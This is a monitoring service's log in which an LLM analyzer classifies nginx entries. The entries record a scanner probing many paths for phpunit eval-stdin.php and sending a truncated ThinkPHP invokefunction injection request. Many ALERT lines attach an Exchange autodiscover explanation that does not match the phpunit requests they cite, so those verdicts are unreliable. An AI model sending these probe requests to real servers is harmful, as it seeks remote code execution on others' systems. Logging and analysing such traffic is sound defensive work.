Mar 20 13:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:01.950961 [observer] Pipeline: processed=5784 pattern_hits=5504 llm_calls=280 llm_errors=3 learned=4
Mar 20 13:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:01.950992 [observer] Patterns: hash=5504 prefix=0 regex=0 contains=0 deny=43 alert=434 suppress=0 misses=280
Mar 20 13:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:04.236943 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:04.236995 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to a phpunit file path via nginx, which is a common probe for known vulnerabilities or misconfigurations. Line=2026-03-20T13:45:14.263149323Z 2026/03/20 13:45:14 [error] 422#422: *750652 open() "/usr/share/nginx/default/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 13:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:04.237053 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:14.263273073Z 101.36.107.228 - - [20/Mar/2026:13:45:14 +0000] "54.200.221.0" "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:47:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:09.462354 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:47:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:09.462394 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a sensitive phpunit file suggests probing for remote code execution vulnerabilities. Line=2026-03-20T13:45:14.645628179Z 2026/03/20 13:45:14 [error] 422#422: *750652 open() "/usr/share/nginx/default/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo...
Mar 20 13:47:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:09.462457 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:14.645776757Z 101.36.107.228 - - [20/Mar/2026:13:45:14 +0000] "54.200.221.0" "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:47:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:21.461945 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:47:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:21.461985 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit path is a common probe vector for automated attacks; could indicate an attempted exploit targeting phpunit. Line=2026-03-20T13:45:15.198522595Z 2026/03/20 13:45:15 [error] 422#422: *750652 open() "/usr/share/nginx/default/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct...
Mar 20 13:47:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:21.462036 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:15.198583333Z 101.36.107.228 - - [20/Mar/2026:13:45:15 +0000] "54.200.221.0" "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-...
Mar 20 13:47:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:21.462143 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:15.722585549Z 101.36.107.228 - - [20/Mar/2026:13:45:15 +0000] "54.200.221.0" "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:47:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:25.618141 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:47:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:25.618208 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access to a PHP unit testing file under V2/vendor/phpunit was attempted, which is a common probe for PHP unit exposure; module open() failure indicates missing file but the path suggests an attempted exploit vector. Line=2026-03-20T13:45:15.722585546Z 2026/03/20 13:45:15 [error] 422#422: *750652 open() "/usr/share/nginx/default/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory...
Mar 20 13:47:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:25.618260 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:16.276342391Z 101.36.107.228 - - [20/Mar/2026:13:45:16 +0000] "54.200.221.0" "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-...
Mar 20 13:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:31.312713 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.72 action=deny pattern_type=
Mar 20 13:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:31.312747 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to PHPunit test file paths (eval-stdin.php) commonly targeted in exploitation attempts; indicates probing for vulnerable components. Line=2026-03-20T13:45:16.276283932Z 2026/03/20 13:45:16 [error] 422#422: *750652 open() "/usr/share/nginx/default/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct...
Mar 20 13:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:31.935922 [observer] Pipeline: processed=5796 pattern_hits=5511 llm_calls=285 llm_errors=3 learned=4
Mar 20 13:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:31.935949 [observer] Patterns: hash=5511 prefix=0 regex=0 contains=0 deny=48 alert=434 suppress=0 misses=285
Mar 20 13:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:37.617393 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:37.617429 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Probe-like request targeting phpunit path (eval-stdin.php) suggests attempted exploitation or vulnerability scanning. Line=2026-03-20T13:45:16.789549920Z 2026/03/20 13:45:16 [error] 422#422: *750652 open() "/usr/share/nginx/default/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo...
Mar 20 13:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:37.617479 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:16.789723226Z 101.36.107.228 - - [20/Mar/2026:13:45:16 +0000] "54.200.221.0" "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:47:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:42.760396 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:47:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:42.760440 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a PHPUnit file path is commonly associated with automated probes for known vulnerabilities; not successful but warrants attention. Line=2026-03-20T13:45:17.244193113Z 2026/03/20 13:45:17 [error] 422#422: *750652 open() "/usr/share/nginx/default/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or dire...
Mar 20 13:47:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:42.760494 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:17.244264857Z 101.36.107.228 - - [20/Mar/2026:13:45:17 +0000] "54.200.221.0" "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" ...
Mar 20 13:47:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:46.720184 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.72 action=deny pattern_type=
Mar 20 13:47:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:46.720237 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit tooling path under /vendor/phpunit/phpunit, a common vector for exploiting PHP applications. The log shows an error opening a potentially sensitive file, indicating probing activity. Line=2026-03-20T13:45:18.009740425Z 2026/03/20 13:45:18 [error] 422#422: *750652 open() "/usr/share/nginx/default/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 13:47:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:46.720297 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:18.009825497Z 101.36.107.228 - - [20/Mar/2026:13:45:18 +0000] "54.200.221.0" "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:47:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:50.260614 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:47:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:50.260664 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request appears to target a phpunit path that is commonly exploited to locate sensitive test infrastructure; the error shows a missing file, which may indicate probing or attempted access to restricted resources. Line=2026-03-20T13:45:18.699859034Z 2026/03/20 13:45:18 [error] 422#422: *750652 open() "/usr/share/nginx/default/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo...
Mar 20 13:47:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:50.260716 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:18.699857054Z 101.36.107.228 - - [20/Mar/2026:13:45:18 +0000] "54.200.221.0" "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:47:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:54.401080 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:47:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:54.401138 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to a PHP unit test file (eval-stdin.php) under the cms/vendor/phpunit path suggests probing for phpunit exploit vectors; common in automated vulnerability scans. Line=2026-03-20T13:45:19.164688064Z 2026/03/20 13:45:19 [error] 422#422: *750652 open() "/usr/share/nginx/default/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 13:47:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:54.401211 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:19.164715812Z 101.36.107.228 - - [20/Mar/2026:13:45:19 +0000] "54.200.221.0" "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:47:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:58.641411 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.75 action=deny pattern_type=
Mar 20 13:47:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:58.641453 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path commonly abused in automated attacks; indicates probing for vulnerable PHP unit files. Line=2026-03-20T13:45:19.867198107Z 2026/03/20 13:45:19 [error] 422#422: *750652 open() "/usr/share/nginx/default/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 13:47:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:47:58.641504 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:19.867339766Z 101.36.107.228 - - [20/Mar/2026:13:45:19 +0000] "54.200.221.0" "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:01.956555 [observer] Pipeline: processed=5808 pattern_hits=5517 llm_calls=291 llm_errors=3 learned=4
Mar 20 13:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:01.956583 [observer] Patterns: hash=5517 prefix=0 regex=0 contains=0 deny=54 alert=434 suppress=0 misses=291
Mar 20 13:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:05.107341 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:05.107379 [hints] Suggestion for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: field type "pid" seen in 51/86 lines, example: "422#422:" → "<PID>"
Mar 20 13:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:05.107395 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Probe-like access to phpunit path in nginx error log; indicates potential vulnerability scan Line=2026-03-20T13:45:20.578351604Z 2026/03/20 13:45:20 [error] 422#422: *750652 open() "/usr/share/nginx/default/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct...
Mar 20 13:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:05.107448 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:20.578577986Z 101.36.107.228 - - [20/Mar/2026:13:45:20 +0000] "54.200.221.0" "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-...
Mar 20 13:48:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:12.684240 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:48:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:12.684280 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a known phpunit path may indicate probing for local code execution vulnerabilities. Line=2026-03-20T13:45:21.185787660Z 2026/03/20 13:45:21 [error] 422#422: *750652 open() "/usr/share/nginx/default/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direc...
Mar 20 13:48:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:12.684336 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:21.185913965Z 101.36.107.228 - - [20/Mar/2026:13:45:21 +0000] "54.200.221.0" "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "...
Mar 20 13:48:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:20.032581 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:48:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:20.032624 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit path suggests probing for known PHP unit vulnerabilities. Line=2026-03-20T13:45:21.835833096Z 2026/03/20 13:45:21 [error] 422#422: *750652 open() "/usr/share/nginx/default/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo...
Mar 20 13:48:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:20.032677 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:21.835913617Z 101.36.107.228 - - [20/Mar/2026:13:45:21 +0000] "54.200.221.0" "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:48:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:24.935931 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 13:48:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:24.935974 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx error shows an attempt to access a PHP unit test file (phpunit) which is uncommon in normal traffic and could indicate probing for test artifacts. Line=2026-03-20T13:45:22.291289754Z 2026/03/20 13:45:22 [error] 422#422: *750652 open() "/usr/share/nginx/default/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such fil...
Mar 20 13:48:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:24.936032 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:22.291387071Z 101.36.107.228 - - [20/Mar/2026:13:45:22 +0000] "54.200.221.0" "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredta...
Mar 20 13:48:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:30.671712 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:48:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:30.671751 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to phpunit utility file under /panel/vendor/phpunit/phpunit is a common target for PHP unit testing tool probes; the error shows missing file but indicates an attempted access to a sensitive path. Line=2026-03-20T13:45:22.743822915Z 2026/03/20 13:45:22 [error] 422#422: *750652 open() "/usr/share/nginx/default/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct...
Mar 20 13:48:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:30.671803 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:22.743855111Z 101.36.107.228 - - [20/Mar/2026:13:45:22 +0000] "54.200.221.0" "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-...
Mar 20 13:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:31.936712 [observer] Pipeline: processed=5818 pattern_hits=5522 llm_calls=296 llm_errors=3 learned=4
Mar 20 13:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:31.936738 [observer] Patterns: hash=5522 prefix=0 regex=0 contains=0 deny=59 alert=434 suppress=0 misses=296
Mar 20 13:48:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:36.353077 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.75 action=alert pattern_type=
Mar 20 13:48:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:36.353119 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit tooling path (eval-stdin.php) which is a common probe for RCE in PHP environments; indicates a potential attempt to abuse known tooling. Line=2026-03-20T13:45:23.165357567Z 2026/03/20 13:45:23 [error] 422#422: *750652 open() "/usr/share/nginx/default/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direc...
Mar 20 13:48:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:36.353191 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:23.165470105Z 101.36.107.228 - - [20/Mar/2026:13:45:23 +0000] "54.200.221.0" "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "...
Mar 20 13:48:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:43.288622 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.78 action=deny pattern_type=
Mar 20 13:48:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:43.288660 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit eval-stdin.php path suggests probing for PHP unit-related vulnerability (potential LFI/RCE). Line=2026-03-20T13:45:23.634912445Z 2026/03/20 13:45:23 [error] 422#422: *750652 open() "/usr/share/nginx/default/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo...
Mar 20 13:48:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:43.288761 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:23.635068412Z 101.36.107.228 - - [20/Mar/2026:13:45:23 +0000] "54.200.221.0" "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:47.912226 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:47.912259 [hints] Suggestion for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: field type "connection_id" seen in 55/93 lines, example: "*750652" → "<CONN>"
Mar 20 13:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:47.912273 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a PHP unit test file path that does not exist suggests probing for phpunit exposure; not definitive compromise but warrants alert. Line=2026-03-20T13:45:24.113365094Z 2026/03/20 13:45:24 [error] 422#422: *750652 open() "/usr/share/nginx/default/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 13:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:47.912336 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:24.113505323Z 101.36.107.228 - - [20/Mar/2026:13:45:24 +0000] "54.200.221.0" "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:48:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:52.517750 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.72 action=deny pattern_type=
Mar 20 13:48:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:52.517785 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an attempted PHP thinkphp injection payload in the request URL targeting an index.php file, indicative of an exploit attempt. Line=2026-03-20T13:45:24.594617078Z 2026/03/20 13:45:24 [error] 422#422: *750652 open() "/usr/share/nginx/default/index.php" failed (2: No such file or directory), client: 101.36.107.228, server: _, reques...
Mar 20 13:48:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:52.517839 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:24.594737123Z 101.36.107.228 - - [20/Mar/2026:13:45:24 +0000] "54.200.221.0" "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]...
Mar 20 13:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:01.417942 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:01.417983 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Evidence of an attempted exploit via a crafted request to index.php (thinkphp vulnerability pattern) leading to a file-not-found error. No evidence of success; still suspicious and warrants monitoring. Line=2026-03-20T13:45:25.045104384Z 2026/03/20 13:45:25 [error] 422#422: *750652 open() "/usr/share/nginx/default/public/index.php" failed (2: No such file or directory), client: 101.36.107.228, server: _,...
